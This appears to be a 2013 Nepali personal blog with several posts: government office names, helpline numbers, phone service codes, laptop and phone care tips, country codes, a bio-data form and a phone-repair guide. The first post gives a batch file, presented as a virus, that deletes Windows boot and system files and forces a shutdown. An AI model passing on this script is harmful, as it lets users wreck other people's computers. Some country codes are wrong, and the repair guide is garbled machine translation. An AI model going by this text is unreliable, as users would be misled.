Monday, 18 February 2013

how to make a vairus like

open notepad and type

@echo off
 msg * ??????????? ????? ?????? ??
 activated*  Virus
 c:\autoexec.bat del
 c:\autoexec.bat attrib-r-s-h
 c:boot.ini del c: boot.ini
 c:\ntldr del c:\ntldr
 c:\windows\win.ini del
 @echo off
 over virus + very yes.*
 shutdown -s-t 10-v ""

save it as name.bat          
don't click it  double in computer
do it your own risk
it is only for learning

clean city


don't forget it

quation for you

nepali goverment web site

To see on Napali language   .  Install preeti front on your computer
;'rgf ljefu   suchana bibhag
nf]s ;]jf cfof]u    lok sewa aayog
/fli6«o dfgj clwsf/ cfof]u   rastriya manaw adhikar aayog
dxfGoflwjQmfsf] sfo{no  mahanyadhiwaktako karyalaya
;jf]{Rr cbfnt  sarwochcha adalat
zflGt tyf k'g lgdf{0f dGqfno  santi tatha puna nirman mantralaya
ef}lts of]hgf tyf lgdf0f dGqfno  bhautik yojana tatha nirman mantralaya
jfl0fHo tyf cfk'lt{ dGqfno wanijya tatha aapurti mantralaya
u[x dGqfno  griha mantralaya
ko{6g tyf gful/s p8ofg dGqfno    paryatan tatha nagarik udyan mantralaya
e'dL;'wf/ tyf Aoj:yf dGqfno bhumisudhar tatha byawastha mantralaya
/Iff dGqfno rachhya mantralaya
o'jf tyf v]ns'b dGqfno yuwa tatha khelkud mantralaya
;'rgf tyf ;4~rf/ dGqfno suchana tatha sanchar mantralaya
lgjfr{g cfof]u   nirwachan aayog
clVtof/ b'?kof]u cg';Gwfg cfof]u akhtiyar durupayog aanusandhan aayog
dxf n]vf kl/Ifssf] sfo{no maha lekha parichhyakko karyalaya
k|wfg dlGq tyf dlGqkl/ifbsf] sfo{no pradhan mantri tatha mantriparisadko karyalaya
cy{ dGqfno artha mantralaya
pßf]u dGqfno udyog mantralay
s[ifL tyf ;xsf/L dGqfno krishi tatha sahakari mantralaya
>d tyf oftfot Aoj:yf dGqfno  shram tatha yatayat byawastha mantralaya
k//fi6« dGqfno parrastra mantralaya
dlxnf afnaflnsf tyf ;dfh sNof0f dGqfno mahila balbalika tatha samaj klyan mantralaya
ag tyf e' ;+/If0f dGqfno  ban tatha bhu sanrachhyan mantralaya
lzIff dGqfno shichhya mantralaya
;fdfGo k|;f;g dGqfno  samanya prasasan mantralaya
:yflgo ljsf; dGqfno  sthaniya bikas mantralaya
phf{ dGqfno  urja mantralaya
lj1fg tyf k|ljlw dGqfno  bigyan tatha prabidhi mantralaya
Gofo tyf sfg'g ljefu  nyaya tatha kanun bibhag
cWofudg ljefu  adhyagaman bibhag
cf}iflw Aoj:ykg ljefu aausadhi byawasthapan bibhag
sDklg /hLi6«f/sf] sfo{no kampani rajistrar ko karyalaya
s[ifL ljefu  krishi bibhag
vflg tyf e'ue{ ljefu  khani tatha bhugarbha bibhag
3/]n' tyf ;fgf] pßf]u ljefu  gharelu tatha sano udhyog
;xsf/L ljefu sahakari bibhag
lghfdlt lstfa vfgf  nijamti kitab khana
k'/ftg ljefu   puritan bibhag
e'dL ;'wf/  tyf Aoj:ykg ljefu  bhumi sudar tatha byawasthapan bibhag
:jf:Yo tyf hg;+Vof dGqfno  swasthya tatha jansankhya  mantralaya
l;rfO{  dGqfno  sichai mantralaya
aftfj/0f dGqfno   batawaran mantralaya
/fxbflg ljefu rahadani  bibhag
zx/L ljsf; tyf ejg lgdf{0f  shahari bikas tatha bhawan nirman
pßf]u ljefu  udyog bibhag
cfGtl/s /fh:j ljefu aantarik rajswa bibhag
s]lGb«o tYof+s ljefu  kendriya tathyank bibhag
vfg]kflg tyf 9n lgsf; ljefu khanepani tatha dhal nikas bibhag
hn tyf df};d ljefu  jal tatha mausam bibhag
gfkL ljefu  napi bibhag
g]kfn u'0f:t/ ljefu   Nepal gunastar bibhag
eG;f/ ljefu   bhansar bibhag
:yflgo k'jf{wf/ tyf s[ifL ;8s ljefu  sthaniya purwadhar tatha krishi sadak bibhag
e' ;+/If0f ljefu  bhu sanrachhyan bibhag
/fli6«o lgs'~h tyf jGohGt' ;+/I0f laefu  rastriya nikunja tatha wanyajantu sanrachyan bibhag
jf0fLHo ljefu  wanijya bibhag
;8s ljefu  sadak bibhag
dxLnf ljsf; ljefu  mahila  bikas bibhag
x'nfs ;]jf ljefu hulak sewa bibhag
a}b]zLs /f]huf/ ljefu baideshik rojgar bibhag
>d ljefu  shram bibhag
/fli6«o of]hgf cfof]u  rastriya yogana aayog
/fli6«o ;Ts{tf s]Gb«  rastriya satarkata Kendra
/fli6«o blnt cfof]u    rastriya dalit aayog
g]kfn gfu/Ls p8ofg k|fljlws/0f  Nepal nagarik udyan prabidhikaran
/fli6«o k|s[lt ;+/If0f sf]if  rastriya prakiti sanrachhyan kosha
e' ;'rgf tyf ceLn]v ljefu   bhu suchana tatha abhilekha bibhag
kz';]jf ljefu pasusewa bibhag
jg ljefu wan bibhag
ljß't ljsf; ljefu bishut bikas bibhag
;'rgf ljefu   suchana bibhag
d'b|0f ljefu  mudran bibhag
lzIff ljefu sichhya bibhag
vfß k|ljlw tyf u'0f lgoGq0f ljefu khadhya prabidhi tatha niyantran bibhag
k|xl/ lstfa vfgf  prahari kitab khana
/fli6«o ;'rgf cfof]u  rastriya suchana aayog
sf7df08f} dxfgu/ kflnsf  kathmandu mahanagar palika
g]kfn ko{6g af]8{  Nepal paryatan bord
dxfn]vf lgoGq0f ljefu    mahalekha  niyantran bibhag
ljZj ljßfno cg'bfg cfof]u –eQmk'/ biswa bidhyalaya anudan aayog bhaktapur
 lqme'jg ljZj ljßfno lslt{k'/ tribhuvan biswa bidhyalaya
k'jf{~rn ljZj ljßfno  lj/f6gu/  purwanchal biswa bidhyalaya
kf]v/f ljZj ljßfno  pokhara biswa bidhyalaya
sf7df08f} ljZj ljßfno kathmandu  biswa bidhyalaya
n'lDagL ljZj ljßfno lumbini biswa bidhyalaya
lj lk sf]O/fnf :jf:Yo k|lt:7f0f  b.p. koirala swasthya pratisthan
lrlsT;f lj1fg /fli6«o k|lt:7f0f  chikitsa  bigyan rastriya pratisthan
kf6g :jf:Yo lj1fg /fli6«o k|lt:7f0f patan swasthya bigyan rastriya pratisthan
south asianuniversity, India

/fh:j cg';Gwfg ljefu   rajswa anusandhan bibhag
16600155000    free call from ntc
if u like it share or tell your friends 

Thursday, 7 February 2013

Free call on Nepal and very important

Free call on Nepal and very important
j¿0foGq     !)!
6«flkms k|x/L   !)#
Traffic police  103
afnaflnsf vf]htnf; ;dGjo s]Gb«     !)$
afn x]Nk nfOg    !)(*
Children help line    1098
g]kfn 6]lnsd -;f]wk'5_ NTC df dfq    !(&
Inquiry on NTC    197
g]kfn 6]lnsd dd{t    !(*
Maintained on ntc    198   ntc
g]kfn 6]lnsd df]afOn OGSjfO/L   !$(*
Inquiry ON   NTC (mobile)      1498
UTL   ;f]wk'5   )!–@@@@@@@
Inquiry ON UTL   01-2222222
NCELL  ;f]wk'5  ())%-!_(   (*)())%)))
Inquiry on NCELL 9005
:jf:uy ;DalGw         !!!%
Inquiry about health       1115 (ncell/ntc/utl)
g]kfn ;/sf/ ph'/L ug]{ 7fp       !!!!
To complain Nepal government      1111(Ntc)
g]kfn k|x/L       !))
Nepal police    100

Friday, 1 February 2013

Secret mobile phone code

Secret mobile phone code*3370#
This Nokia code activates Enhanced Full Rate Codec (EFR) – Your Nokia cell phone uses the best sound quality but talk time is reduced my approx. 5%#3370#
Deactivate Enhanced Full Rate Codec (EFR)*#4720#
Activate Half Rate Codec – Your phone uses a lower quality sound but you should gain approx 30% more Talk Time
With this Nokia code you can deactivate the Half Rate Codec
Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release Date, 3rd Line : Compression Type
Phones software version if *#0000# does not work
For checking the International Mobile Equipment Identity (IMEI Number)
Provider Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)
Network Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)
Country Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)
SIM Card Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)
This lets you know who called you last (Only vodofone)
Last call (Only vodofone)
This phone code allows you to check the number that “All Calls” are diverted to
Displays phone security code in use
Lets you see the private number
Allows you to check the “Call Waiting” status of your cell phone.
Allows you to check the number that “On No Reply” calls are diverted to
Allows you to check the number that “Divert If Unreachable (no service)” calls are diverted to
Allows you to check the number that “On Busy Calls” are diverted to
Phone code that removes operator logo on 3310 & 3330
Reset phone timers and game scores
Displays the SIM Clock status, if your phone supports this power saving feature “SIM Clock Stop Allowed”, it means you will get the best standby time possible
Manufactures code
Restore factory settings
Software version for the nokia 8110
Displays – 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again
Deactivate the PWM-Mem
Turn on “All Calls” diverting to the phone number entered
Turn on “No Reply” diverting to the phone number entered
Turn on “On Busy” diverting to the phone number entered
This is the default security code

Service codes Motorola CDMA: w150, w150i, w170, w170c, w200, w210, w355:

Set English language:
1. Menu
2. Down 7 times, Right soft button
3. Down 3 times, Right soft button
4. Down 1 times, Right soft button
5. Down 4 times, Right soft button
6. select language now

Service codes Samsung:
E900 software version: *#5002*8376263#
E900 full reset: *2767*3855#

Service codes Spice:
S404 enable COM port: *#42253646633# -> Device -> Set UART -> PS ->
S410 engineer mode: *#3646633#
S900 software version: *#8375#
S900 serial no: *#33778#

Service codes Philips:
S200 enable COM port: *#3338913# -> Device -> Set UART -> PS ->

Service codes "Chinese" models:
default user code: 1122, 3344, 1234, 5678
Engineer mode: *#110*01#
Factory mode: *#987#
Enable COM port: *#110*01# -> Device -> Set UART -> PS Config ->
Restore factory settings: *#987*99#
LCD contrast: *#369#
software version: *#800#
software version: *#900#
set default language: *#0000# Send
set English language: *#0044# Send
set English language (new firmware): *#001# Send

Service codes BenQ:
software version: *#300#
test mode: *#302*20040615#

Service codes Pantech:
software version: *01763*79837#
service menu: *01763*476#
reset defaults (phone/user code reset to default): *01763*737381#

Service codes VK-Mobile 3xx, 5xx:
software version: *#79#
software version: *#837#
service menu: *#85*364# (hold #)
Service codes VK200, VK2000, VK2010, VK2020, VK4000:
software version: *#79#
service menu: *#9998*8336# (hold #)
reset defaults (phone/user code reset to default): *#9998*7328# (hold #)

Service codes LG:
software version: 2945#*#
KG300 NVRAM format: 2945#*# -> menu 15
Service codes Sony-Ericsson:
J100 software version: #82#

Service codes Fly:
M100 software version: ####0000#
2040(i) reset defaults: *#987*99# Send
MX200 reset defaults: *#987*99# Send
MX200 software version: *#900# Send
SL300m reset defaults: *#987*99# Send
SL300m software version: *#900# Send
SL500m reset defaults: *#987*99# Send
SL500m software version: *#900# Send
MP500 reset defaults: *#987*99# Send
MP500 software version: *#900# Send
Set language to English: *#0044#
Set language to Russian: *#0007#

Service codes Konka:
C926 software version: *320# Send
C926 set default language: *#0000# Send
C926 set English language: *#0044# Send

Service codes GStar:
GM208 (Chinese Nokea 6230+) engineering menu: *#66*#
Set language to English: *#0044#
Set language to Russian: *#0007#

Service codes Motofone-F3:
Motofone F3 software version: **9999* Send
***300* Set SIM Pin
***310* / ***311* SIM Pin ON | OFF
***000* Reset Factory settings
***644* Set Voicemail number
***260* / ***261* Auto keypad lock ON | OFF
***510* / ***511* Voice Prompts ON | OFF
***160* / ***161* Restricted Calling (Phonebook only) ON | OFF
***200608* Send: software version
***200606* Send: software version
***200806* Send: flex version
***250* / ***251* Keypad tones ON | OFF
***470* Select time format
***500* /***501* Prepaid Balance Display ON | OFF
***520* Change language

Service codes Motorola:
C113, C114, C115, C115i, C116, C117, C118, C122 software version: #02#*
C138, C139, C140 software version: #02#*
C155, C156, C157 software version: #02#*
C257, C261 software version: #02#*
V171, V172, V173 software version: #02#*
V175, V176, V176 software version: #02#*
C168, C168i, W220 software version: *#**837#
C168, C168i, W220 master reset: *#**367628# Send
C168, C168i, W220 E2p reset: *#**778337# Send
W205, W208, W375 software version: #02#*
do it on your own risk

Laptop Computer Safety

 Laptop Computer Safety
1. Shut It Down

like a desktop computer a laptop computer needs to be shut down when not in use.  prevents the laptop from overheating and it  needs the rest.

2. Adjusting Power Settings

 it options will help your laptop from heating up when not in use even if for short periods of time. You can set your hard drive and display to turn off after a set time period.  other option is to set the laptop /desktop to go into standby or hibernate mode.

3. Before You Pack It Up

before you put your laptop into its carrying bag that it is shut down.. When enclosed in a notebook bag there is no air circulation and the results can be worse than melting. Don't find out the hard way and just be sure to turn off your laptop.

4. Vent Maintenance

Part of your weekly routine should be to inspect and clean the air vents in your laptop. Forced air dusters can be used to keep the air vents clean and free from debris. It's important to know that you should never push anything into the air vents.

5. Checking the Fan

Overheating problems can be caused by the laptop fan not working properly. Always check the laptop manufacturer's online support and your warranty information. It may be possible to download software to test your laptop fan.

6. BIOS Updates

Some laptops control the fans through the BIOS. Check online with the laptop manufacturer for BIOS updates. If you aren't comfortable updating the BIOS yourself, have someone in your IT dept. or have an outside Computer Technician do it for you.

7. Avoid Lap Burn

Using a laptop desk or cooler will prevent you from being burned when using your laptop. A good laptop desk will have large enough vents for allowing air circulation between you and the laptop. Some laptop desks have additional fans which use power from the laptop itself to stay cool.

8. Soft Spots

It's a wise idea not to use any soft material as a buffer between you and your laptop. Always operate your laptop on a hard surface, preferably one that allows ventilation. Soft materials can block the airflow vents and cause it to overheat. If it is not possible to avoid using a soft surface, an optional heat sink base should be used to maintain cooling.

9. Unplug Accessories

Whenever your laptop will not be in use, even for short periods of time remember to unplug any accessories. Not only do they use power but they could cause the laptop to overheat. It's especially important to unplug any accessories before packing your laptop in its carrying case. While you may believe it will make it quicker to use, it could damage your laptop, the accessory and/or your laptop bag.

Three steps will fix most problems on mobile: Reboot, Reset, Update.

Method 1 - Reboot your device
Switch off your  device(mobile)
Take the battery out
Wait 40 seconds
Put the battery back in, and turn on again

Your data and contacts are not affected by removing the battery.

Method 2  - Reset the settings
To restore your phone to its factory settings, follow the instructions in the guide that came with it.
setting- security setting- reset/restore setting-(sellect option)/ or press password/code and ok

See all Nokia user guides and other phone

Your data and contacts are not affected by restoring factory settings.

 Method 3  - Update the software
Some problems can be solved by updating your phone's software to the latest version.
by manufatur of  tecnition


Tips to maintain mobile phones.

Tips to maintain mobile phones.

1. Protect your handset with a screen guard(plastic) and if possible with a plastic and leather cover.

2. You can charge your battery anytime as against myths that you should first get it fully drained. This was when Nickel-Cadmium and Nickel-Metal Hydrate batteries were used. Only ensure that you use an original and genuine battery and charger  . Be extra cautious with all the accessories whether they are genuine or not as an incompatible one can damage your phone permanently.

3. Always enable the PIN number on your SIM Card and phone lock i.e security code on your phone to prevent unauthorized/other person      use.

4. Always handle your cell phone with care. Rough treatment may damage the circuit board inside, so avoid dropping and unnecessarily
      shaking your phone.

5. To clean your mobole  phone just wipe it with a soft cloth. If need arises, you can use a mild detergent to clean the caver.
But see to it that the detergent does not get into the phone through the holes. it may be bhone dammage

6. Always keep your phone in a cool, dry place and avoid high temperature areas. protect you phone during rain.

7. keep your phone out of reach of your children. Your data may be more important than your phoneset.

International country codes

  international phone number code     
contries  code kenya 254
afganestan 93 korea (north) 850
albania 355 korea (south) 82
algeria 213 kuwait 965
angola 244 lebanan 961
argentina 54 liberia 231
australia 61 libya  218
austria 43 luxem bourg 352
bahrain 973 lithuania 370
bangladesh 880 macau 853
belarus 375 malasia 60
beljium 32 maldives 960
bhutan 975 mali republic 223
bolivia 591 malta 356
bosnia and horzogovina 387 maxico 52
brazil  55 mangolia 976
brunai 673 marocco 212
colombia 57 myanmar 95
congo 242 nepal 977
costarica  506 netherlands 31
croatia 385 new zealands 64
cuba  53 niger 227
cyprus 357 norway 47
checz republic 420 oman 968
denmark  45 pakistan 92
ecuador 593 paraguay 595
egypt 20 peur 51
elsalvador 503 philippines 63
ethiopia 251 poland 48
finland 358 portugal 351
france 33 qutar 974
germany 49 romania 40
ghana 233 russia 7
greece 30 saudiarabia 966
greenland 299 serbia 381
haiti 509 seierra leone 232
hongkong  852 singapore 62
hungary 36 slovakia republic 421
iceland 354 slovenia 386
india 91 somalia 252
indonesia 62 south africa 27
iran 98 spain 34
iraq 964 sri lanka  94
ireland 353 sudan 249
israel 972 swaziland 286
italy 39 sweden 46
japan 81 switzerland 41
jordan 962 syria 963
kazakhastan 7 taiwan 886

Bio data format

Bio data format

Name            :                       
Age            :               
Date of birth        :               
Address for communication:    

Phone / Mobile    :                     
Email            :             

Educational Qualifications:

Year of passing    Qualification    Specialisation or Subjects    School / College / University / Institute    Total
    SSC / 10th / ___               
    HSC / 12th / ___               
    Post graduation               
    Any other               

Please explain gaps, if any _________________________________________________

Work experience:

No of years    Organisation    Designation    Job responsibilities    Any other relevant information

Strengths and Weaknesses:

Sl no    Strengths    Actual Example
    Weaknesses    Actual Example

Hobbies / interests:


Languages known:

Last salary drawn: Gross (including PF, HRA, etc.) - Rs. _________________    

         Take-home - Rs._______________
Any other information you would like to provide:                   


How to repair dead phone?
How to repair dead phone ?
Problems found on mobile:-
1. Hardware Problem category
2. Software Problem category
3. Problem Category his SW and HW           

  11111111111111 problems and solutions1111111111111111
1. Total dead cell phone
Mobile phones
· Die alone,
· Total death due to falls, and
· Death total for the taxable water.
a. Total death because death itself.
- Remove the battery and plug in again, and try using another battery and try turn on
- Check the battery connector and try the press to see the level of flexible or not,
replace damaged when new.
- Connect the charging of the phone, when the indicator on the phone in and still will not turn on, then obviously you can not live on mobile phones because of interference from IC PA (Power Amplifier). After IC PA revoked your mobile phone can turn it on again. And so no signal will be installed a new IC PA (Power Amplifier).
- When the tide does not exist and charging indicator on the phone still does not want to live on should be conducted further tests using power supply. But there may also have an ugly tin on the PCB, remove the IC PA (Power Amplifier)  solution, then clean the tin on the PCB where IC PA (Power Amplifier) stick, replace  old IC PA (Power Amplifier), HP switch, it must be a flame.
Examination with power supply:
Necessary power supply on a scale of 1 ampere ampere (A) or 1000 mA.
With the aim that the examination can be more easily and clearly.
The steps are as follows:
- Connect the cable from the power supply to the mobile phone battery connector of at least three wires, with a negative sequence, BSI and positive. (Black, green and red)
- Navigate volt power supply at 3.6 V (or in accordance with tolerance Hp-0.5 V)
- Mobile phones in the state of OFF,     and press the button on
- If the current (amperage) in a digital ampere dipower supply pointer when the button is pressed on, it just means there's still a problem on its hardware (HW), it is necessary to check the components on / off until the battery.
- When the ampere when the button is pressed on, up about? 50 mA, then the problem that occurs is a matter of software (SW), then you need to do is  HP (flash) or program is upgraded to higher versions.
b. Total death from falls.
- HP may not be tested by using the power supply, but HP should be dismantled first, heated, and repositioned back to the location / position of the components has changed as a result of HP fell.
- After that, the new HP using the power supply should be tested to determine damage to the Hardware  / Software .
- Most likely a damaged components as a result of the fall is the HP PA IC / IC Power.
c. Total death due to hit the water.
- For taxable HP water is also the first time should not be tested by using the power supply, because the risk of short circuit occurs between the components in water, but must first HP divakum, heated, or by first diblower given IPA cleaning liquid, can also use the grain silica to absorb the water that existed at HP.
- After HP confirmed it was dry, then we should use the power supply to determine the damage occurred on the Hardware  or Software .
- At HP's exposed to water, usually there is damage to HPnya accessories.
2. Total die because of IC phone UI.
In HP's case like this then requires test equipment that is power supply.
The steps are as follows:
- Connect the power supply on the phone, give the voltage (volts) equal to 3.6 V (or in accordance with tolerance Hp-0.5 V)
- At the time the phone is in off state, refer to the power supply needles amperes will increase by 100mA.
- The phone will start, LED lights, VIBRA vibrate.
- Remove the IC UI, then turn on the phone.
- Then there is the display on the LCD mobile phone "Insert SIM Card".
- Put new IC UI.
- Turn on the phone, the phone will work fine.
3. Total dead cell phone because the CPU IC.
To determine whether the cell phone because the IC die total CPU is as follows:
- Give the voltage (volts) on the phone by using the power supply of 3.6 V (or in accordance with tolerance Hp-0.5 V).
- At the time the phone is not turned on, the needle ampere silent, but if the phone is switched on then the needle will rise 100mA amperes.
- If the IC CPU is still in good condition, then we only need to heat the IC CPU by using a blower, but if the CPU IC is damaged, then we need to replace with a new CPU IC. Before we replace our CPU IC must first have the anti-hot glue and liquid glue crusher anti-heat, because the CPU IC is protected by anti-heat glue, after we destroy the anti-hot glue, then we can heat (blower) CPU IC for a new replacement. Similarly, after we replace it with a new CPU IC then we need to give more anti hot glue to protect the new CPU IC we replace it.
4. Total dead cell phone when we call.
For testing we use the power supply by way of:
- Connect the phone with power supply, give the voltage (volts) equal to 3.6 V (or in accordance with tolerance Hp-0.5 V) on the phone.
- Needles amperes will not move when the phone is still in a state of death.
- We turn on the phone and then used to make calls, then the needle will show the number of amperes above 400mA.
- Replace with a new IC PA, after re-testing was done as above, if the needle test results show the figures below 400mA amperes, the phone is in good condition.

best of luck (do it on your own risk) byeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee